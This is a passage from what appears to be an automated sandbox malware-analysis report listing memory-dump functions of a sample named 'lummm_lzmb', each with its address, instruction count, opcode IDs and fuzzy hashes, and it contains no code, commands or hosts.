Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a020ed46f86307841e69fcb920f937242d31fa93923155e800a61380141a7db
Instruction ID: bc87f7c5a7f9f4efa4f7742f486a7a3c6c4c2a8a42b17cd5d353c75f04d4c7bc
Opcode Fuzzy Hash: 2a020ed46f86307841e69fcb920f937242d31fa93923155e800a61380141a7db
Instruction Fuzzy Hash: 9DF0F23218D384AFCB038BA48D55B853F71AF06210F0A40D6F284DF4B3C26AD8259B52

Function 012BB2D9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d1bd0dbafe385bd20a4e75d754cc84bd4ec60fe0717f8ee50d286cbf447578
Instruction ID: c05da585a580385299373c09d2d55df7d6a382f996865186dae9539f32d61981
Opcode Fuzzy Hash: 43d1bd0dbafe385bd20a4e75d754cc84bd4ec60fe0717f8ee50d286cbf447578
Instruction Fuzzy Hash: 07F0A03893400ECFC764EFE5E4D21ECBB31FB84390F104666D402472A5DB7045918B91

Function 012BAFF6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 014867cd4111fb008b512eb13d587bc6ef1b05ac6abeca3678aec2054bb32100
Instruction ID: d7cbae5abb970340f9e7859fad445635f5b6cad725a2d1325cd06bdb9fa36137
Opcode Fuzzy Hash: 014867cd4111fb008b512eb13d587bc6ef1b05ac6abeca3678aec2054bb32100
Instruction Fuzzy Hash: 81F0273953811DCFC760DBA8E9851ECBB71FF84369F1047B6D4028A2A5C371684AEB90

Function 0758A378 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction ID: 7e01ecb12748de393d08682539274242a2e5618806496b65e06aa895254b1a0d
Opcode Fuzzy Hash: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction Fuzzy Hash: 2DE0C9B4E0520CEFCB84DFA8D84169CBBF4FB49310F14C1AAA808A3340DA329A52DF40

Function 07571583 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0720e9d9fec1df83b9f0359fd10bd4976b0712c52cdf77841467730311af2f
Instruction ID: a5bbf4318550b34db5fc37d088064f8e3dad733ba5d60fefa3bb84dd17522ac2
Opcode Fuzzy Hash: db0720e9d9fec1df83b9f0359fd10bd4976b0712c52cdf77841467730311af2f
Instruction Fuzzy Hash: 6AF0DA74A08129CFCB65EF29C894BEAB7B5FB48600F0045D5E50D93344D734AE85CF90

Function 0758BD80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction ID: 765b5d8771357d0863e6f450f9dc0beea0262c0c978d740556ea33e49b3bbf2d
Opcode Fuzzy Hash: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction Fuzzy Hash: C0E0C9B4E05208EFCBC4DFA9D441A9CBBF4EB49310F10C0AAA818A3340D6329A51DF40

Function 0758CFB8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction ID: a88487a840d5ae490b198d14a48fd9881e214e305e3d47005f1419c80a950e0d
Opcode Fuzzy Hash: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction Fuzzy Hash: BAE0C9B4E05208EFCB84DFA8D5416ACBBF4FB49310F10C0AAA909A7340D6329A52DF54

Function 07585CB8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction ID: edeeb248cf11cd5c6fdb058cc4162b4f090555932012d475eb8210d679f9fb5a
Opcode Fuzzy Hash: 67a286a321f2837be30818289f09f5ec45fc662eb1953ef551d3e143026570a5
Instruction Fuzzy Hash: 65E0C9B4E05208EFCB84DFA8D9416ACBBF4FB49310F10C1AAA808A3340E6329A51DF50

Function 02E40E59 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e6020d2e9948b70daa701a02700c2b2cc10192f2b7c60743980c575c6ac4ce
Instruction ID: f3c5bad1fdf11ae54e439d9cf1f76908c228b381c8105a1bb63785d238a11cb6
Opcode Fuzzy Hash: 68e6020d2e9948b70daa701a02700c2b2cc10192f2b7c60743980c575c6ac4ce
Instruction Fuzzy Hash: 13E092B644D3C05FCF475FA0A8210613F70EF6331474540DBE0868B0A3E3290D25DB15

Function 0758F618 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3371d95131ad176ffafd0ad1f228fc4e37685f8cca64ad673a6142c07e0f6941
Instruction ID: a03b35d50575829308c6fa23a08803ae68d5c8f6c27e03905bf2b15e7119d88b
Opcode Fuzzy Hash: 3371d95131ad176ffafd0ad1f228fc4e37685f8cca64ad673a6142c07e0f6941
Instruction Fuzzy Hash: 85E0ED74E05208EFC784DFA9D44169CBBF4EB49314F10C1A9D808A3390D6325A02DF40

Function 0758F080 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3371d95131ad176ffafd0ad1f228fc4e37685f8cca64ad673a6142c07e0f6941
Instruction ID: 30352ecb3a6cbcd0a312a76931c5732aafc5ff0d6e76b3b3fe319fa9c1cb721f
Opcode Fuzzy Hash: 3371d95131ad176ffafd0ad1f228fc4e37685f8cca64ad673a6142c07e0f6941
Instruction Fuzzy Hash: 7DE0ED74E05208EFC784DFA9D54169CFBF4FB49300F10C0A99819A3341D6325A01CF40

Function 02E404F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a66da7b3a71b3bf027ed87c689754bbdbd7ff02bb861f4daf895f346800130
Instruction ID: 912846bda06f041110ba6f08e10e02a8b2e2a8376cb45c9634fa2e56f719e847
Opcode Fuzzy Hash: c6a66da7b3a71b3bf027ed87c689754bbdbd7ff02bb861f4daf895f346800130
Instruction Fuzzy Hash: CFE0BD6204E7C08FC7038B749D696A43F709E1321434E20DBD1C4CF5B3D6299D1AD722

Function 02E400B0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c88d90b6bc839f30b1f71a1b004ad2c0db2cbd91d37d435e6d3bc1d6157613d
Instruction ID: 2086d34e0ff436f6fa8442565eb2a702a5246429242606eaedaf832207f854a0
Opcode Fuzzy Hash: 5c88d90b6bc839f30b1f71a1b004ad2c0db2cbd91d37d435e6d3bc1d6157613d
Instruction Fuzzy Hash: 36D05E2635012167851866EDA416ABE76FFD7DBA627140239E606CBB80DD92DC1503A2

Function 075889D0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798c039b9275b11b3f4b99a5c26a772f331dca459d3c830b2ae197dd2745954d
Instruction ID: 3f84fc466eb9afe5284695640445d9b4a8bbed5e9cbde02a1befb6373763f865
Opcode Fuzzy Hash: 798c039b9275b11b3f4b99a5c26a772f331dca459d3c830b2ae197dd2745954d
Instruction Fuzzy Hash: D9E01A74D09108EBC784DBA9D5416ACBFB4EB49210F10C0AAD85867341DA726A01DF41

Function 012BD06C Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49ca0bea24682e38da2204a535fe1120a34a554c4d0be919fcc5756b826385f1
Instruction ID: acdb2b34b4d28a6b667585b5318e986e55409d9d8c0b1b818bb2cbb710d57bbf
Opcode Fuzzy Hash: 49ca0bea24682e38da2204a535fe1120a34a554c4d0be919fcc5756b826385f1
Instruction Fuzzy Hash: 91D05E3D16512E8FC7A1EBD5F8964D8BB71F7843AAB008762D50247228DBB0584B8BE1

Function 012B9348 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c44877c69efce71463f837e0caaa40aed7de87bf23a82c45e80caff9ffcb71
Instruction ID: 25c0fd54ceb667d13b49d78f605596867fb6e36dc41fd85ee536ef8de3e59f13
Opcode Fuzzy Hash: 01c44877c69efce71463f837e0caaa40aed7de87bf23a82c45e80caff9ffcb71
Instruction Fuzzy Hash: 97E0863A100158EFDB01DF84D941D967B32FB98310B25805BFA4587252C732DD22DB55

Function 0758DD60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1880e6926d6e2cf3ffbbe9ab9a709b2fad1ec1300d2e993b9dfb4e573d64058c
Instruction ID: 1b218f32509bea181b5c6159066d6a5a2d4c6d22780374b159116252bd3ae4e7
Opcode Fuzzy Hash: 1880e6926d6e2cf3ffbbe9ab9a709b2fad1ec1300d2e993b9dfb4e573d64058c
Instruction Fuzzy Hash: EFE0E6B4A09208DBC784DB94D5416ACBBB4AB49314F1091D9D80827391DA325E41DB85

Function 0758B220 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39666ffe199926819b35c85c9781e08dc654fe5c1ab8d5d27c716184060133db
Instruction ID: d959ecd1bcaafcfeae8871824a5e9692da1501f6b22a14e8902652e650698074
Opcode Fuzzy Hash: 39666ffe199926819b35c85c9781e08dc654fe5c1ab8d5d27c716184060133db
Instruction Fuzzy Hash: EEE0C2B044110CEBCB80FFF5D90068E7BF9DB09200F0051AAE50197160EE324A409B92

Function 0758E698 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58936b46e66ba1a9779134f19d450b7dbb0d46d4511335add2b7a27d85ff8574
Instruction ID: 78472e7fdb00d7f10508cd689e0c32709e208e3b8572cf91d54db19c40ca9d2d
Opcode Fuzzy Hash: 58936b46e66ba1a9779134f19d450b7dbb0d46d4511335add2b7a27d85ff8574
Instruction Fuzzy Hash: 20E0C27094110CEBCBC0FBF5E90168E7BF9DB05300F1050A5E50197150EE328A019B92

Function 012B91CB Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc543f8256484670ea8759175c7c73ab2cdd99c02a43ce25cafa129d51ede005
Instruction ID: 1d263773c9e0e8342dcd57a027f8dc706b1662675c9bfcd969e7be7b84d1507b
Opcode Fuzzy Hash: fc543f8256484670ea8759175c7c73ab2cdd99c02a43ce25cafa129d51ede005
Instruction Fuzzy Hash: D3D05B3136834E4EEF191A68285E3E46B5C6742AD4F244AAFD305CD1C3DEA144C09355

Function 012BD1CF Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0efe6e3aff779ee136592e70e21c6fe1688a29c47171b9891f3a62c400ecb0
Instruction ID: d24e0d9c91a49c065d7ee68664f4989b8e407e8b3f9788b8be29c3ad129a35ea
Opcode Fuzzy Hash: 9c0efe6e3aff779ee136592e70e21c6fe1688a29c47171b9891f3a62c400ecb0
Instruction Fuzzy Hash: 20E0C23D13810CCFC7A0EBA0E8860D8BB30FB80324F0043A2D015432B8C37058458B92

Function 012BD079 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c90fbef4635fd10d65970a5be160144a8cdcdd0e9af41d28ff65824a6299d0e
Instruction ID: fed410b4b6c9487ecdb6dc6611126abeee86769498f0b67b7539b204fdb4c2fd
Opcode Fuzzy Hash: 6c90fbef4635fd10d65970a5be160144a8cdcdd0e9af41d28ff65824a6299d0e
Instruction Fuzzy Hash: D9D0173D56402CDA8AA1EBD5F89509CBB71F794319B108763C55187228DB7058459BD2

Function 012B9358 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b8198bb05c1c2035b0fee092e8490a5381818cb12f554b1b55168eac7fa28c
Instruction ID: fcfe9ff0c1bf45d7a514b85f0619e19b23db70f8374174db311a8253eee3f470
Opcode Fuzzy Hash: 10b8198bb05c1c2035b0fee092e8490a5381818cb12f554b1b55168eac7fa28c
Instruction Fuzzy Hash: 9AD01736200118BF8B01DE84DC00CA67B6AEB88220B14C01AFE0447211CBB3EC22EBE0

Function 012B5959 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23bde3ef8f8ea261da1c39d3b95f036aec31125c59b5075a2d3c98f016c411e
Instruction ID: 3250e3267b2d8356eb02dde1534f6f2c0d8df8561042eac295154bdbb3c5f3d5
Opcode Fuzzy Hash: d23bde3ef8f8ea261da1c39d3b95f036aec31125c59b5075a2d3c98f016c411e
Instruction Fuzzy Hash: 28D022722893808BC72203703C9E0F93F2AA98313130A4083E84AC6942EB3AC808C391

Function 012BD2A5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc84fc58744fbeb5d173a69ffce244faeeadcdf044703afd88e1ced12d4b0ec
Instruction ID: 88fbd18bd2d24fb8a2af9b0c5ad0329c8e33aaae6e88aaa05bdac2796e662389
Opcode Fuzzy Hash: 0fc84fc58744fbeb5d173a69ffce244faeeadcdf044703afd88e1ced12d4b0ec
Instruction Fuzzy Hash: 3BD0177A6290188FC7A1EA95F8951DCBB30F795329F0143A2D151872AAC7705A458B91

Function 012BD311 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6464488aa85b76d70a55aeb0a8ca6afbb26499effef4a7859a270e609a4644
Instruction ID: f44da4709098082542401b7c39f05860b7d17c573479ddb8b291bdaf7988d4d8
Opcode Fuzzy Hash: 5e6464488aa85b76d70a55aeb0a8ca6afbb26499effef4a7859a270e609a4644
Instruction Fuzzy Hash: 34D05E3A12442C8BC7A0EAA9F882498B730FBC4329B004362E111832B8C7B059468BC1

Function 012B2D38 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da9255c70faf59f0d591c562dcde5377fe412e911085651ebd996e8b047baa6
Instruction ID: 1690a8a547a587325b58088ea16a7d6f60d292dca3be66853cf521208bc354ca
Opcode Fuzzy Hash: 8da9255c70faf59f0d591c562dcde5377fe412e911085651ebd996e8b047baa6
Instruction Fuzzy Hash: 9BD02239508280CF8A030EF15A281C02F22CA9202071D80C7C01E9E25AE87B680A0B22

Function 02E403E0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca2967a07ce1e245af5236a7317ada675a9a77a6baf2e8c42001aaaf29d0106
Instruction ID: af0e6931763d41b04ada2d03e7e4344f0ee5235c20f5192ea5daa389592d2477
Opcode Fuzzy Hash: 2ca2967a07ce1e245af5236a7317ada675a9a77a6baf2e8c42001aaaf29d0106
Instruction Fuzzy Hash: CED09236280208BFDB018E85DD06F8A3F65EF08B10F104040FB045E1B1C3B2E820AB55

Function 012B0838 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399fc4d4f2faa939d93a4e4b01fb7d79195f7c6daa09eff33df73e7ab8e72f88
Instruction ID: 1bca18e0462c0d4db0d8f3be219af7d107ff82d9596dd699f0cf79c034d59c97
Opcode Fuzzy Hash: 399fc4d4f2faa939d93a4e4b01fb7d79195f7c6daa09eff33df73e7ab8e72f88
Instruction Fuzzy Hash: 08D012B304D3884FCB121731743C0C83F68DA62000B858482E0488A463A5732607D351

Function 012B8E08 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb82cdfacafbe9db1e6c4142377c57f453b6ac7b6dc5397a9eb09d3bcf0b1fb
Instruction ID: cc1e3df4f1ada4485c4946bdf09e32f0c13013fe42f0de902752bfc90fff6e8c
Opcode Fuzzy Hash: feb82cdfacafbe9db1e6c4142377c57f453b6ac7b6dc5397a9eb09d3bcf0b1fb
Instruction Fuzzy Hash: 4DD0A7811483D01AC7137BF000510663F32DBE3164F4509D7D0D6870F2D5314C02C721

Function 012B3310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf88d78dbeb9858cca730a1fe0adb969ea16ddfe1de00d7a09a0a6a2a57705b
Instruction ID: bb891432cb547f4466a67a82fa9021aec58c4d7e3ad2ecc5f0728c0028e098c0
Opcode Fuzzy Hash: 5cf88d78dbeb9858cca730a1fe0adb969ea16ddfe1de00d7a09a0a6a2a57705b
Instruction Fuzzy Hash: A2D0C97520A3804BDB07CA30C4645C5FB60AB96208F2A85CADC858B693CB63B907DB10

Function 012B9569 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ab6129e13b6fc141dc108d55d705fe703858e2b18a255d8d101d4a25bc1013
Instruction ID: b3931f19d6fcffba0b05224f1ca1a876cc23febd87f5d026387bd843015ba6de
Opcode Fuzzy Hash: 38ab6129e13b6fc141dc108d55d705fe703858e2b18a255d8d101d4a25bc1013
Instruction Fuzzy Hash: E7D012742092408FC356C664C4A18017F62AB9620535981DFD445CB366CB27EC07DB14

Function 056E044A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8b56d4aaa6810c0d0fa2773b9093b5f65b81e9c6ab5b92f0d42183af469a86
Instruction ID: 2ae3a76c7bc35f8610c2d9a5642dac5af1539a9b71a3892ec04d1154a02a7852
Opcode Fuzzy Hash: ac8b56d4aaa6810c0d0fa2773b9093b5f65b81e9c6ab5b92f0d42183af469a86
Instruction Fuzzy Hash: 48D05E3180A3889FD741CFB4850834D7E617B46320F41876A90A3DA2C5DB280406CB11

Function 02E40748 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction ID: 1559b7bb1d66cdfc4324202593fed40f7269f97be06a62174427e62a94373c76
Opcode Fuzzy Hash: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction Fuzzy Hash: 8DC00235280208AFD7109A55DC46F457B68AB15B50F554091F7045F6A1C6A2E8109A98

Function 012B5931 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c8a0e0ebb9b594d2d4f1019155038199d9edeb815116d1e356778b32481a15
Instruction ID: 739a494adffcfcbd61b0572ef506a9b08e6b43d586780de129a563f36fe3380e
Opcode Fuzzy Hash: 00c8a0e0ebb9b594d2d4f1019155038199d9edeb815116d1e356778b32481a15
Instruction Fuzzy Hash: A5D012F15453906FDB05CA60CCA57183F61BB52259F0D00D9D884892D7E6655D16C615

Function 056E8290 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d00d17bcd6f7bd11569a8119532d1e8fba6e650690da5b1e4c0a2e02757d8d
Instruction ID: 0dbfb6f55b01451d2f18d51cd6ad81cb140d670e2143b47111a58fea7d2b4953
Opcode Fuzzy Hash: f9d00d17bcd6f7bd11569a8119532d1e8fba6e650690da5b1e4c0a2e02757d8d
Instruction Fuzzy Hash: ACB02220882308F388002A8A3888C22BA8FCBC0F08A008000A00E0A28B88B028008A00

Function 012B5968 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df294a5ce0d218c435056ff598395dde995271ea64289a83b5be09c65f068021
Instruction ID: 09572c7070b2de54e238d871a760be4f74ae468dcdfd10aa1f5700b049ed667f
Opcode Fuzzy Hash: df294a5ce0d218c435056ff598395dde995271ea64289a83b5be09c65f068021
Instruction Fuzzy Hash: BAB0923422470887CB0826B4709D02C3B9AA6885213449465A50F82240EE76A8049A80

Function 012B5940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
